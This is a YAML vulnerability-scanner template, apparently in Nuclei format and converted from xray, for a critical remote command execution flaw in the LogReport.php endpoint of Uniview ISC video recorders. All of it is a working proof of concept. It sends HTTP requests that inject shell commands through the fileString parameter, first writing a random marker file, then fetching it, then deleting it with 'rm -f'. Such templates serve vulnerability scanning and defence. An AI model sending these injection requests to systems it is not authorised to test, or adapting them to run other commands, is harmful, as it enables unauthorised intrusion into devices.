id: poc-yaml-uniview-isc-rce

info:
  name: poc-yaml-uniview-isc-rce
  author: xiaobaicai
  severity: critical
  tags: xray-converted,rce,ct-446255
  reference:
    - http://wiki.peiqi.tech/wiki/iot/%E5%AE%87%E8%A7%86%E7%A7%91%E6%8A%80/%E6%B5%99%E6%B1%9F%E5%AE%87%E8%A7%86%E7%A7%91%E6%8A%80%20%E7%BD%91%E7%BB%9C%E8%A7%86%E9%A2%91%E5%BD%95%E5%83%8F%E6%9C%BA%20ISC%20LogReport.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html

http:
  - raw:
      - |
        GET /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;echo%20{{rand_base(8)}}>{{rand_base(8)}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
  - raw:
      - |
        GET /Interface/LogReport/{{rand_base(8)}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
  - raw:
      - |
        GET /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;rm%20-f%20{{rand_base(8)}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200